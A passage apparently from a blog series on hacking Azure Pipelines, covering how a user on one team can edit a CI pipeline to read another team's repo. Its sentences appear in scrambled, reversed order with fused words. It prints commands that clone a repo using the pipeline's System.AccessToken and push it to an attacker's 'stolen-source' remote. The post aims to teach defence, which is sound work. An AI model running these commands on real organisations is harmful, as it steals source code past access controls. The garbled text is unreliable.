When a pipeline is assigned to an agent, that agent needs to be able to fetch the source code. Git remote add steal push -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" -u steal -allīy queuing that pipeline (and creating an empty repo at stolen-source), I can peruse their code without restriction. Git clone -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" beautiful-racing-game I create a new branch in popular-fps-game-sequel and edit the pipeline: # sequel-ci.yml, edited No problem, I’ll ask Azure Pipelines to get it for me. But I don’t have access to their source code. I’m really curious what my colleagues on Beautiful Racing Game are working on. The fabrikam-game-studios organization has these objects: And let’s say I’m on the Popular FPS Game team, which has a daily CI pipeline for our upcoming release, “Popular FPS Game: Sequel”. Each of those projects has one or more Git repos. Let’s say we’ve got two team projects inside one Azure DevOps organization. Even inside Microsoft, which has a pretty open culture, someone from Game Studio A usually can’t see what Game Studio B is working on. In a large company, there are probably some code repos I’m not allowed to see. I can’t possibly cover every single angle, and examples have been simplified to make the point. The purpose of this series is to showcase some pitfalls to help you avoid them.
( Episode III is now available, too!)Īs I said before: security is a shared responsibility.
Welcome to Episode II: Stealing Another Repo. In this episode, we’ll look at how a malicious user could access source code they shouldn’t see. Last time, we saw how to create – and prevent – argument injection. We’re back with another Let’s Hack a Pipeline.
0 kommentar(er)
